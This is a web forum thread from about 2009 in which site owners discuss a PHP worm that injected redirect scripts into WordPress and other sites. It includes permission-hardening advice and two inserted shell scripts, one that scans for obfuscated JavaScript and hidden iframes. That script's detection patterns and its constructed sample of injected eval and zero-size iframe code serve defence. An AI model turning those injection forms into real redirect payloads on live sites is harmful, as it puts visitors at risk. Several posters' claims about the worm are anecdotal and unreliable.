    In fact, there are actually hundreds of compromised domains across the internet which we've seen over the last few days that have been infected. It seems some obfuscated javascript is being injected into these sites, which attempts to redirect the user to another domain hosting a malicious payload.
    From Sophos - Anti-virus, anti-spam and encryption software for businesses blogs Uncategorized | SophosLabs blog
    There are a few articles on that page about the redirect viruses.

    Seems wikipedia was hit, too. I wonder how many posts he will make before
    he can say wiki is clean?
    The Wikipedia Review > Sorry about that

    USAToday.com hit with redirect: Does this qualify as "not in the news?" lol.
    USAToday.com says:
    May 21, 2009 at 2:38 pm

    USATODAY.com was notified about a potential problem with one of our advertisements. We investigated the situation and disabled the ad at 1:25 PM EST on May 7, 2009. It appears that advertisements, which ran between 9-10 AM EST on May 7, 2009, may have contained malicious advertising ("malware"). Upon learning of the unwanted activity on USATODAY.com, we promptly took down the advertisements and will continue our investigation as to the source of the problem. We apologize for any inconvenience the situation may have caused. You may wish to update your anti-virus software to help protect against and block malware and other viruses. - The USATODAY.com Team


    Wow - this has been around longer than I thought. No wonder it is becoming so
    prevalent.
    'Link hack' redirects MySpace visitors to phishing site > Web > Vulnerabilities & Exploits > News > SC Magazine Australia/NZ

    Here's a quote from the Vermont Information Security website that has a 6 figure infection report on it -- as early as last year.
    Nope - nothing to see here folks....move along.
    In April 2008 Panda Labs, a computer security and anti-virus publisher, announced that more than 280,000 web sites had been altered to redirect computers to malicious websites which would attack them in a variety of different ways. The SANS Institute, a computer security research and training organization, recently declared browser attacks to be "Top Cyber Security Menace" for 2008.
    Isn't this all just a lot of fun?

    And don't count on your hosts to be helpful. I am using HostExcellence which has won awards for its hosting. When I contacted them about this I got a very unexpected "Your problem not ours" answer from them. My tech actually had to contact them to tell them to pull a few of THEIR files off our account. They didn't put fresh ones back on. I suppose they want us to TELL them to do so. Instead I am getting ready to move to a more security minded and savvy server. Screw that attitude.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

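The Sophos description quoted above (obfuscated JavaScript injected into otherwise legitimate pages, redirecting visitors to a domain hosting a malicious payload) is something a site owner can look for on the server itself rather than waiting for a visitor's antivirus to complain. The script below is an added example written for this thread, not code from the post's author or from Sophos: it walks a document root for the usual obfuscation and hidden-iframe markers and lists the files for review. The sample site it writes is constructed (the iframe points at the reserved hostname redirect.invalid), and the patterns are assumptions about what injected code commonly looks like, so treat hits as a review queue rather than proof.

```sh
#!/bin/sh
# Added example (not from the thread or from Sophos): list files under a site's
# document root that carry the usual markers of injected, obfuscated JavaScript
# or hidden redirect frames. Hits are a review queue, not proof of compromise:
# some legitimate minified libraries also use String.fromCharCode.

# Assumed markers (ERE): decode-and-eval chains, document.write(unescape(...)),
# character-code string building, and iframes sized to zero or hidden by CSS.
INJECT_RE="eval\((unescape|base64_decode|gzinflate|str_rot13)\(|document\.write\(unescape\(|String\.fromCharCode\(|<iframe[^>]*(width=[\"']?0[^0-9]|height=[\"']?0[^0-9]|visibility: *hidden|display: *none)"

# Print each matching .php/.html/.htm/.js file, sorted; always exits 0.
scan_for_injection() {                 # usage: scan_for_injection DIR
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.js' \) \
      | sort \
      | while IFS= read -r f; do
            if grep -Eiq "$INJECT_RE" "$f"; then
                printf '%s\n' "$f"
            fi
        done
}

# Number of flagged files.
count_injected() {                     # usage: count_injected DIR
    scan_for_injection "$1" | wc -l | tr -d ' '
}

# Matching lines of one file with line numbers, for cleaning up by hand;
# exits 1 when the file has no match.
show_injection() {                     # usage: show_injection FILE
    grep -Ein "$INJECT_RE" "$1"
}

# Constructed sample site: two clean files, one theme footer with an appended
# obfuscated script (it decodes to the word "document", nothing harmful) and
# one page with a zero-size iframe pointing at a reserved .invalid hostname.
write_sample_site() {                  # usage: write_sample_site DIR
    mkdir -p "$1/wp-content/themes/sample"
    cat > "$1/wp-content/themes/sample/header.php" <<'EOF'
<?php /* constructed clean file */ ?>
<html><head><title><?php bloginfo('name'); ?></title></head>
EOF
    cat > "$1/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'constructed');
EOF
    cat > "$1/wp-content/themes/sample/footer.php" <<'EOF'
</body></html>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74'))</script>
EOF
    cat > "$1/index.html" <<'EOF'
<html><body>Hello
<iframe src="http://redirect.invalid/in.cgi" width="0" height="0" frameborder="0"></iframe>
</body></html>
EOF
}

# Stand-alone use: sh find_injected_js.sh /path/to/public_html
if [ $# -gt 0 ]; then
    scan_for_injection "$1"
fi
```

Run it against a fresh copy of the same WordPress release as well as against the live site; a marker that appears in both is almost certainly legitimate, and one that appears only on the live site deserves a look with `show_injection`.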
  • Profile picture of the author HeySal
    Peter - actually I think it was an infected theme they have listed rather than the whole site - but you have personally experienced how the thing spreads. Let me reiterate - this isn't a WP thing - it's a PHP thing. Just so much WP and so many rss feeds attached that these are getting more attention.

    Dump off your ftp until you are clean and install a new one - it uses the FTP as one means to get in and out once it's there as far as Fin saw. As I also said earlier - the worm builds holes before it dumps codes. Shuts down abilities to find it, too. Some of it's encrypted. It's getting real quick, too. It's gotten worse just since my main site was hacked. The one that you get on your own pc will actually knock out your ability to find websites that have scripts to kill it. Misspelling the file just slightly will help in a websearch to kill it.

    This thing is just invasive and evil.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

  • Profile picture of the author Peter Bestel
    Sal,

    I'm reasonably confident that my PC is now clean as I was able to download all necessary fixing progs via another clean PC.

    I've already dumped my FTP prog (Filezilla) and I've switched to Secure FTP using WinSCP. Every login for every site has been changed, every name and every password for my databases have been changed. It's all been done using Roboform to avoid keylogging and I will go through the same process on a monthly basis.


    Peter
  • Profile picture of the author HeySal
    Oh for Christ's sake, Pratt - My MAIN site was hacked --- this one is a different site that was just in the process of being built - not even active yet......please read what I said before you get all irate at me.

    I HAVE contacted wordpress themselves (thought I already said that, too) and I am WAITING for a response -- from them.
    I will report back on what wordpress themselves has to say about it when they answer my report to them. If you have a problem with that, too - then you have a problem with it. But THEY are the ones who are going to tell me different. Not anyone else. This is ridiculous.

    As far as anyone else having problems -- if they don't have the right anti-virus, they'll never even know they have it, let alone where they picked it up.

    Linux/Mac - don't know if they can or can't be ---- but now you are talking about personal computers -- and in here we are talking WEBSITES. Both get hit, though.

    I have already STATED I am NOT a tech - I reported here what happened, and what I was doing at the time-- if I turn out to be wrong, that is a good thing, but I sure wanted to save anyone else the problem because it is HELL to fix it.

    IF YOU are impervious, then you are in a terrific position. Right now I am getting ready to move my main site to another server who has 24/7 monitoring and I am hoping that will be it for that site.
    I am also greatly considering getting off MS and going to Linux and just putting up with what I assume will be a learning curve that will slow down my production right when I need the speed.

    I breezed some links so you could see what is going on since you seem to think there isn't much problem with this virus. USAToday - was a redirect. I forgot to post the link. I also thought the wiki report was talking about WIKI itself, not just his site. I was just trying to deliver more info and was in too much of a hurry to do it well.

    Now I don't really have time to argue with you. I posted what happened in hopes of saving someone else from this thing. When wordpress answers either Dave or my contact, I will let people know what THEY say. As for now, Dave's host and he are working on his account to clean it off - it's being a pain for them - just as Peter found it to be on his. Until WORDPRESS explains to me that the fact that I was working on an unpublished site inside of an admin interface with their site yet didn't get the virus on their site -- I am going to believe my Avast and it told me that page was infected-- No matter whose names or what links we can pass back and forth or whatever questions can be examined.

    I don't have any more time for this. Will post whatever Wordpress has to say about it when either Dave or I hear back from them.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

  • Profile picture of the author ECS Dave
    Another update here, from your friendly,
    and right neighborly, ECS Dave!

    Just got another update from the folks over to the hosting company,
    where this appears to have all started...

    From what I can tell, it was NOT Sal's browsing of the wordpress themes...
    In fact, it had little or nothing to do with wordpress at all...

    It appears that this ATTACK happened at approximately the same time
    that Sal was browsing the themes, and understandably became concerned
    that it may have been related...

    The support guys tell me that a server "neighbor" had a script installed
    on their account that had some "vulnerabilities", and as of my latest
    communication with support, that account has been disabled.

    I was also told, that it was NOT anything on my accounts, that was
    the culprit. In fact I was informed that it was quite widespread on
    the "shared" server, and that the technical support staff had engaged
    a security expert to track down the errant script, and that this same
    staff were working feverishly to clean the machine of all traces of the
    ATTACK.

    More details, as I get them...

    Be Well!
    ECS Dave

    P.S. Here's the reply I received, when I asked if it was something on, or within "my" account...
    No - it wasn't you. You were affected unfortunately.
    The neighbor account was deleted. We'll let you know more as we know more.
  • Profile picture of the author ECS Dave
    One more thing, in the interest of easing folks' minds about
    wordpress, and the security therein:

    Hardening WordPress WordPress Codex

    There you have it... (and that post is a very good read, for FREE!)

    Be Well!
    ECS Dave
  • Profile picture of the author HeySal
    So the fact that I was cruising Wordpress when my alarm went off was a coincidence and not a wordpress file.

    That is actually good to know - even if I have to admit I was wrong --
    Now I have a very good question to ask that maybe a security expert can answer.
    Why was the URL of the virus www.wordpress...../install/ if it was actually something on another website. I don't understand this at all.

    Does this thing mimic any URL that you are on at the time when it hits and that is why it's so hard to tell the source? Or did my Avast think that it was that page because that is where I was browsing when the site was hit?

    Anyone know? Even if this wasn't on Wordpress itself - there is still one hell of a mean and versatile virus out there and it'd be nice to know what's going on with it.

    I think I'll go to Avast and see what they have to say. Maybe someone there knows.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    • Profile picture of the author stevenh512
      Originally Posted by HeySal View Post

      Why was the URL of the virus www.wordpress...../install/ if it was actually something on another website. I don't understand this at all.

      Does this thing mimic any URL that you are on at the time when it hits and that is why it's so hard to tell the source? Or did my Avast think that it was that page because that is where I was browsing when the site was hit?
      I've been using Avast for a long time, and while I think it's the best of the "free" virus scanners, it's always had a problem with "false positives" (I have quite a few files on my hard drive that show as virus/trojan when I know for a fact they're clean and have the source code to prove it). In this case it doesn't seem like it's a "false positive" since ECS Dave has confirmed that the server was compromised, just that it gave you the wrong URL. The only reason I can think of for that, is maybe the wordpress.com url was the last request your browser sent out before Avast detected the virus. In that case, I can see how it might report that as the offending URL even if it really wasn't.

      edit: This kind of thing, being a simple PHP "worm" and not a rootkit or anything like that, should never be able to spread from one hosting account to another on a server like that unless there was some kind of permissions problem (maybe it found something with 777 permissions and spread that way?). I'd recommend hosting on a server that uses PHPSuExec or SUPHP so you have no reason to ever leave any file permissions wide open like that. Now that I've been with HostGator for a couple months I couldn't imagine hosting with anyone that allowed or required 777 permissions.. lol
      Signature

      This signature intentionally left blank.

      • Profile picture of the author ebuyer123
        Originally Posted by stevenh512 View Post

        I'd recommend hosting on a server that uses PHPSuExec or SUPHP so you have no reason to ever leave any file permissions wide open like that....I couldn't imagine hosting with anyone that allowed or required 777 permissions.. lol
        Hi, Steven

        Can you cut a long story short and just give us a LIST of these secure hosting companies that are affordable and reliable for WP users in particular?

        Or you may want to put up a WSO for selling such a list.

        Thanks?
  • Profile picture of the author GarrieWilson
    It wasn't the other site unless Avast checks by IP too.
    Signature
    Screw You, NameCheap!
    $1 Off NameSilo Domain Coupons:

    SAVEABUCKDOMAINS & DOLLARDOMAINSAVINGS
    • Profile picture of the author Jeremy Kelsall
      You very well could have just stumbled onto a site that was infected or even stuffing cookies...I know my avast goes nuts whenever I go to a site that is cookie stuffing

      Also, when I am doing some automated blog commenting I get some alerts from avast too when doing the commenting strictly on wordpress blogs...
      • Profile picture of the author rosetrees
        Amid all the mud slinging here, my previous post was ignored. Looks like I wasn't so far wrong.

        (My computer was attacked by something a few weeks ago when I was on the website of a local boarding school. I don't blame the site, and returning to it on another computer produced nothing. Just coincidence.

        As you probably realise, I don't have the technical knowledge of many on here. I just assume that some of these attacks happen via a server somewhere - either the ISP or another link in the chain.)
        • Profile picture of the author HeySal
          Originally Posted by rosetrees View Post

          Amid all the mud slinging here, my previous post was ignored. Looks like I wasn't so far wrong.

          (My computer was attacked by something a few weeks ago when I was on the website of a local boarding school. I don't blame the site, and returning to it on another computer produced nothing. Just coincidence.

          As you probably realise, I don't have the technical knowledge of many on here. I just assume that some of these attacks happen via a server somewhere - either the ISP or another link in the chain.)

          Yes - a coincidence - but an unsettling one at the very least. I have heard others talk about false positives - but this is really a whole new thing - not only did the alarm go off - the URL was related to the site I was on -- AND - I WAS hit by a virus so I actually wasn't being warned falsely. Had the Virus URL not been a wordpress look-alike I wouldn't have been so positive that it came from there.


          Michael - The problem HAS been fixed on the server, by a very diligent Host Admin. Dave chose a responsible host. I wish I had done the same when I put up my main website - they just told me it's my problem.

          I don't think this is a waste of time - this is one nasty virus and its stealth is staggering. It appears that the codes that are used are encrypted. There are many questions about how it is getting in. This incident was a "neighboring site on the host"; on my main site it was a hacker who signed up for membership - a live person. With the escalation of the infection I think it's important that we find out just what is going on. Updates etc. are good things, but from what I have seen in research, they aren't foolproof.
          Also - what are the different hosts doing about it? I sure don't want to get stuck on a server that won't help fix such a virulent problem. Anything we can figure out here that helps prevent the spread or saves our sites is a good thing.
          Signature

          Sal
          When the Roads and Paths end, learn to guide yourself through the wilderness
          Beyond the Path

  • Profile picture of the author Ut
    I just wanted to say thanks much to Sal & everyone who contributed to this thread.

    Originally Posted by HeySal View Post

    I don't think this is a waste of time
    No, it's not. Everything happens for a reason and we learn from every situation we are placed in. Nothing wasted.

    Thanks again everyone!
  • Profile picture of the author stevenh512
    I don't exactly have a "list" but I know kiosk.ws (the host Mike Filsaime recommends and uses) and HostGator both run PHP under a suexec environment (PHPSuExec or SUPHP) so the script actually runs as "you" and not as "apache" or "nobody" (or whatever apache's account name is on that particular server). In that environment, there's no need for 777 permissions, your scripts (Wordpress or whatever else) will be able to write to their files when they need to and nobody on any other account will have write access. So short of a rootkit it would be impossible for this kind of worm to spread from one account to another on the same server. Of course the drawback is if your own account gets hit it'll spread through your account like wildfire, but at least you only have to worry about the security of the scripts on your own account and not everyone else's.

    So, my "short list" would be Kiosk and HostGator, I'm sure there are plenty of others. Before buying hosting I'd contact their support and ask them about it. Aside from learning whether or not their server supports running PHP scripts in a suexec environment, you'll also get a good idea of how their support people respond to questions (which is really good to know if you ever need them lol).
  • Profile picture of the author Peggy Baron
    I had a weird thing happen today to one of my WP blogs. Well, maybe it wasn't today but I noticed it today.

    Under the settings, membership was changed to yes "to anyone can register" and yes to "users must be logged in and registered to comment".

    Also, the new user default mode was changed to "subscriber" rather than "administrator" as it should be. That meant anyone who registered could access my dashboard.

    I just installed Peter's recommendations and will check everything. I would guess it's been hacked though.

    Will changing the permissions from 777 screw anything up?

    Thanks,
    Peggy
    • Profile picture of the author MizzCindy
      Originally Posted by Peggy Baron View Post

      ...Also, the new user default mode was changed to "subscriber" rather than "administrator" as it should be. That meant anyone who registered could access my dashboard...
      Wait, I think you want your new users to only be 'subscribers'. That's the lowest level of permissions provided in the codex. You definitely do not want them to be 'administrators'. Or am I misunderstanding?

      Roles and Capabilities WordPress Codex

      Cindy
      • Profile picture of the author Wade Watson
        The proliferation of javascript and the other client side scripting used by web pages has really become one of the great absurdities/plagues of an otherwise great medium. The Internet will never become a stable form of communication until this stuff is dealt with-- but I'm not sure how. I'm constantly dismayed to see javascript used where server side scripting would have worked. But as long as there are lazy programmers, gullible clients and virus purveyors there will be problems like this.
    • Profile picture of the author HeySal
      Originally Posted by Peggy Baron View Post


      Will changing the permissions from 777 screw anything up?

      Thanks,
      Peggy
      Peggy, I'm not a tech -but I know that you should NEVER have permissions set at 777 - post your blog url and I'll see if it sets my avast off to view it.
      • Profile picture of the author Peggy Baron
        Originally Posted by HeySal View Post

        Peggy, post your blog url and I'll see if it sets my avast off to view it.
        Thanks Sal, it's here.

        Peggy
    • Profile picture of the author ThomM
      Originally Posted by Peggy Baron View Post

      I had a weird thing happen today to one of my WP blogs. Well, maybe it wasn't today but I noticed it today.

      Under the settings, membership was changed to yes "to anyone can register" and yes to "users must be logged in and registered to comment".

      Also, the new user default mode was changed to "subscriber" rather than "administrator" as it should be. That meant anyone who registered could access my dashboard.

      I just installed Peter's recommendations and will check everything. I would guess it's been hacked though.

      Will changing the permissions from 777 screw anything up?

      Thanks,
      Peggy
      Peg, 2 things.
      First, the default user mode should be subscriber like Cindy said.
      As a subscriber about all they can do is comment; they can't get into the admin area.
      Second, change your folder permissions to 755. 777 is so scripts can write to the folder. Also if you have any files with the permissions set to 666 change them to 644 for the same reason. Depending on your hosting, you may need to change your theme files' permissions to 666 to edit the theme files in WP. If you do, change them back to 644.
      Third, those membership settings aren't bad really. All it means is if someone wants to comment on a post they must be a registered user. I don't think a lot of spammers will take the time to register, especially when you can simply delete them.
      OK, three things.
      Signature

      Life: Nature's way of keeping meat fresh
      Getting old ain't for sissy's
      As you are I was, as I am you will be
      You can't fix stupid, but you can always out smart it.

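      The 755/644 rule ThomM gives above, together with stevenh512's point earlier in the thread that under suPHP/PHPSuExec scripts run as your own account and so never need 777, as an added shell script that is not from either poster: it lists anything world-writable under a WordPress root and resets directories to 755 and files to 644, leaving anything already tighter alone. The paths in the usage comments are hypothetical.

```shell
#!/bin/sh
# Added example, not code from the thread. Under suPHP/PHPSuExec the PHP
# scripts run as the account owner, so WordPress can write its own files
# without any directory being 777 or any file being 666. This script finds
# entries that are still world-writable and resets them to 755 / 644.
# Assumes a Linux box with GNU find/stat; all paths are constructed examples.

# List every world-writable directory or regular file under $1 as "mode path".
# "World-writable" means the "other" write bit (octal 002) is set, which is
# exactly what 777 directories and 666 files have. Nothing is changed here.
list_world_writable() {
    find "$1" \( -type d -o -type f \) -perm -002 \
        -exec stat -c '%a %n' {} + 2>/dev/null
}

# Number of world-writable entries under $1 (0 when the tree is clean).
count_world_writable() {
    list_world_writable "$1" | wc -l | tr -d ' '
}

# Reset world-writable directories to 755 and world-writable files to 644.
# Only entries that currently carry the "other" write bit are touched, so a
# wp-config.php already locked down to 600 keeps its stricter mode.
harden_wp_permissions() {
    root=$1
    before=$(count_world_writable "$root")
    find "$root" -type d -perm -002 -exec chmod 755 {} + 2>/dev/null
    find "$root" -type f -perm -002 -exec chmod 644 {} + 2>/dev/null
    after=$(count_world_writable "$root")
    echo "fixed $((before - after)) entries, $after still world-writable"
}

# Usage (hypothetical paths):
#   sh wp-perms.sh /home/you/public_html          report only
#   sh wp-perms.sh /home/you/public_html --fix    report, then reset
if [ $# -gt 0 ]; then
    echo "World-writable entries under $1:"
    list_world_writable "$1"
    if [ "${2:-}" = "--fix" ]; then
        harden_wp_permissions "$1"
    fi
fi
```

Run it without --fix first and read the list: on a host that really does need a world-writable upload directory, this script will lock that directory down too, which is the point of moving to a suexec host in the first place.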
      • Profile picture of the author jlxsolutions
        Well, after reading this I thought I might as well end the worries if anyone is wondering whether their sites are insecure.
        Send me a private message with the site address.
        And I'll do a security scan on it and give you a list if anything needs to be fixed.
        And yes, free; it won't occupy my time much anyway.
        I'm new here and might as well provide something positive for the community.
        Sincerely, Jan Lukkarinen, owner of jlxsolutions


        p.s lol that sounded official
      • Profile picture of the author Peggy Baron
        Originally Posted by ThomM View Post

        Peg 2 things.
        First the default user mode should be subscriber like Cindy said.
        As a subscriber about all they can do is comment they can't get into the admin area.
        When they were set as I posted above, it allowed a person to subscribe and then it allowed them into my dashboard. Definitely not what I want!
        When I change it back to Administrator, then they can only comment and I can reply as admin.

        I can't figure out how they were recently changed when I didn't do it.

        Peggy
  • Profile picture of the author lakeview
    Peggy,

    I have all folders at 755 and files at 644 and WP works fine. I'm no expert by any means, but I don't think you should have any folders at 777 so I would change that immediately. I also recommend Peter's suggestion with running the exploit scanner.

    Angela
  • Profile picture of the author ECS Dave
    The hosting provider that I have the account on has in place something that limits the permissions to 755, but I am told that if 777 is needed the machine "knows" to allow the calling script to that level of access...

    From the support team:
    - Late last year, we added suPHP - a much more secure PHP foundation software that does not allow 777 permissions on any file or folder.

    It does allow you to set permissions at 755 and they will act as 777, but more securely. If that didn't make sense, don't worry about it. Just know it's important to protect your accounts from hacks.

    - Server-level security at our data center can't get much stronger without causing your scripts to no longer function. Our data center is successfully repelling 1000s of attacks each day.

    - The next step is to turn on Secure FTP. That's a pretty big change. And it may mean that you need to get an FTP program or service that allows SFTP to access your accounts. (Think of it as having an extra strong door between you and your servers.)
    As previously mentioned:
    Originally Posted by stevenh512 View Post

    This kind of thing, being a simple PHP "worm" and not a rootkit or anything like that, should never be able to spread from one hosting account to another on a server like that unless there was some kind of permissions problem (maybe it found something with 777 permissions and spread that way?). I'd recommend hosting on a server that uses PHPSuExec or SUPHP so you have no reason to ever leave any file permissions wide open like that. Now that I've been with HostGator for a couple months I couldn't imagine hosting with anyone that allowed or required 777 permissions.. lol

    Before buying hosting I'd contact their support and ask them about it. Aside from learning whether or not their server supports running PHP scripts in a suexec environment, you'll also get a good idea of how their support people respond to questions (which is really good to know if you ever need them lol).
    Asking "pre-sales" questions is an excellent idea; do NOT just rely on the "sales page" of the host...

    Be Well!
    ECS Dave
  • Profile picture of the author ebuyer123
    Originally Posted by kanus View Post

    I'm still not clear on exactly how it affected you? It wiped out PHP on your server?
    It will redirect or send you to another webpage.

    Example: when you click on yahoo.com and you end up at CheapHottBabe4uuTonight.com
  • Profile picture of the author Peter Bestel
    A sad post script to this story

    I've got a friend who asked me to tell him about IM a few months ago and he was tentatively dipping his toe into having a web presence. We set him up with a blog, he joined WF and was enjoying Twitter. We were working on getting him a static site too to hopefully become his main source of income. He's got an offline business which could easily transfer to being online.

    His PC and blog got attacked by this virus/trojan and he's been battling with it for about 3 weeks. Because he didn't have the skills to act quickly enough his blog address is now flagged up as an attack site by Google and even his Twitter account has been suspended for suspicious activity. (Presumably because of the link to his blog in his profile)

    He spoke to me yesterday and has decided that, if this is what it's going to be like being an Internet Marketer he doesn't want the hassle. He's decided to cut his losses and forget all about making money online.

    Before you go judging him, imagine for a moment you were learning to drive. Nervous about the whole experience you approach your first junction. You gingerly ease out and WHAM! You're hit by a juggernaut. You survive, but you're obviously shaken. You decide to repair everything and venture out once more, only to be hit again - by the same juggernaut.

    When this happens more than three times you could forgive them for not wanting to drive again. His experience has only been negative.

    Peter
  • Profile picture of the author HeySal
    Originally Posted by kanus View Post

    I'm still not clear on exactly how it affected you? It wiped out PHP on your server?
    When my main site was attacked months back it was attacked via a member who was a hacker. There was a lot more going on with that than just having the virus loaded on there, so yeah, everything php is disabled and host files were yanked. We aren't using mysql at all and php is just toast. The virus was just the icing on the cake. The hacker was a nightmare, but that virus just got into everything and anything that wasn't html once it was let loose in there. Each page that was on a php program was infected. My tech could have fixed it in time, but he's no longer online.
    It was over 1000 pages so it is just easier to start over from scratch.

    The instance I just reported was a normal instance of the virus and just hit us, coincidentally, when I was browsing the WP themes for a new blog, and avast showed a URL for the virus that said http://wordpress..../install/..... so I thought it CAME FROM the wp site. Dave's host told him that it came from a different site on that server and they were able to clean it all up. But it was caught right at the instant it hit my site and wasn't able to get far at all. We were on it too quick for it to do much but land.

    I don't know what it will do if not detected quickly (if you don't have a hacker in your site). It's a worm. I know that the one that hits personal computers eventually delivers a rootkit if it's not dealt with quickly, but I'm not sure if the one that hits websites is the same one.
    I also know that a lot of anti-virus programs fail to detect it and that it also knows how to protect itself from detection - and that it can be a real bear to completely get rid of. Sites like Major Geeks are probably better places to go for info about it than I can give you.

    When I said that it attacks 777 permission programs -- I meant it will infect programs that have the capability of 777 permissions. I'm not sure which of the actual permissions that you can set those programs to are safe and which aren't or if any are completely safe - I just know it's those programs which can be infected. I have always been told - in fact I think it was even said in this thread, that you shouldn't have permissions set at 777. So all I was saying - is that if you are infected, the programs that have those types of permissions at all are the ones you want to check for infection first, I wasn't saying anything about the particular settings. People seem to think this is just a WP virus, and it's not - it gets forums, etc, too.

    I hope that clears up some confusion.
  • Profile picture of the author SurviveUnemployment
    Everyone running any kind of website should be on guard against cross-site scripting (XSS) attacks. Once you fall for one of those, it doesn't matter if you're using top-secret ultra-secure Pentagon blogging software -- you're vulnerable.

    Protect Against XSS Attacks | Charles Linart

    The site hackers have been extremely active lately. All those guys gloating above about how secure their sites are will find out soon enough.
    • Profile picture of the author HeySal
      Originally Posted by SurviveUnemployment View Post

      Everyone running any kind of website should be on guard against cross-site scripting (XSS) attacks. Once you fall for one of those, it doesn't matter if you're using top-secret ultra-secure Pentagon blogging software -- you're vulnerable.

      Protect Against XSS Attacks | Charles Linart

      The site hackers have been extremely active lately. All those guys gloating above about how secure their sites are will find out soon enough.
      Wow - you hit the nail on the head. That's what I have been trying to tell people - my first site was a freakin' fortress. My tech works contracts doing security on gov computers. Not only were those hacked (not just the one he was working) but his own computer was hit at the bios level, uh..hello. He said it took the member months to hack into us after he landed. That's why we're torn to crap right now. What I got the other day was just the average redirect, but those are still nasty as heck.

      On RHS1 we did everything the guy in your article suggested.....and it wasn't enough.

      I've seen some boasting going on about how secure they are and others must be stupid to get a virus..........and I think about how I was feeling about RHS1.....before the hacker got us. It wasn't that I knew how to secure it...but I know my tech is one of the best and in the long run it didn't matter a twat. I hadn't even had a spammer on the site in over 2 years. Was pretty cocky about it. Lesson learned to the tune of 4 years of work on a site.
    • Profile picture of the author Bamma
      Originally Posted by SurviveUnemployment View Post

      Everyone running any kind of website should be on guard against cross-site scripting (XSS) attacks. Once you fall for one of those, it doesn't matter if you're using top-secret ultra-secure Pentagon blogging software -- you're vulnerable.

      Protect Against XSS Attacks | Charles Linart

      The site hackers have been extremely active lately. All those guys gloating above about how secure their sites are will find out soon enough.
      I gloat for good reason.
      I know how it works.
      I know the precautions to take.

      A few years ago I was on the other team and I know the exploits and how to do them and how to protect against them.

      People running around like chicken little are the ones these guys bank on.

      A good Av and real time scanner and common sense WILL protect you.

      They can't get in unless you give them the keys in the form of:
      weak AV,
      5 year old scripts,
      weak passwords,
      running warez, even "harmless nulled php scripts".

      XSS has been around for years and is nothing new.

      Someone will not spend months hacking a blasted blog there is no money in it for them.

      And bios problems ... well, not even going to go there; sounds like someone from a random IRC convo.

      Anyway I am going to bow out, and if someone does get the problem and wants the site cleaned up, contact me; I have plenty of experience with NO recurrences.
  • Profile picture of the author HeySal
    Peggy - don't know anything about settings as I stressed a couple of posts ago, but -- your blog isn't setting off my avast alarms. I clicked about 4 or 5 pages and got nothing but website.
  • Profile picture of the author k8spy8
    I have never fallen into such a situation; I really appreciate that you shared this with us. I want to know, if similar things happen to me, what should I do, and how harmful is this virus? Can anyone tell me?
    • Profile picture of the author jlxsolutions
      Well, as far as I have gathered, this is not a virus.
      Basically what I can tell from this is that a hacker exploited a security hole, inserted an XSS attack on the website and redirected the webpage to a malicious one.
      And whatever comes from there is still unknown.
  • Profile picture of the author marcus passey
    Interesting stuff

    Marcus
    Signature
    Watch me finally make money this year now I have a mentor follow my journey at www.marcuspassey.com

    Are you building a list? get my FREE report on list building CLICK HERE!
    • Profile picture of the author jlxsolutions
      Interesting indeed. Well, due to the fact that I do security checks daily and make sure people's websites and computers are safe from the bad guys, I have come to the conclusion that even though mostly the user gets blamed, the reason most often lies with the host, not the user.
      Like un-updated server software, for example.
      If anyone is willing to give me permission to scan their website,
      I can show some examples.
  • Profile picture of the author jlxsolutions
    To the person who PM'ed me: sure, I'll do the scan.
    I'll post the results here, and as you wanted to be anonymous I'll leave the webpage in question unmentioned. P.S. I can't reply to your PM until I have 15 posts lol
  • Profile picture of the author jlxsolutions
    Well, due to the fact that you wanted to be anonymous, I think I won't post the report at all in here;
    it would be too much work to edit the results.
    But one thing was for sure: the HostGator host had some issues which needed urgent attention.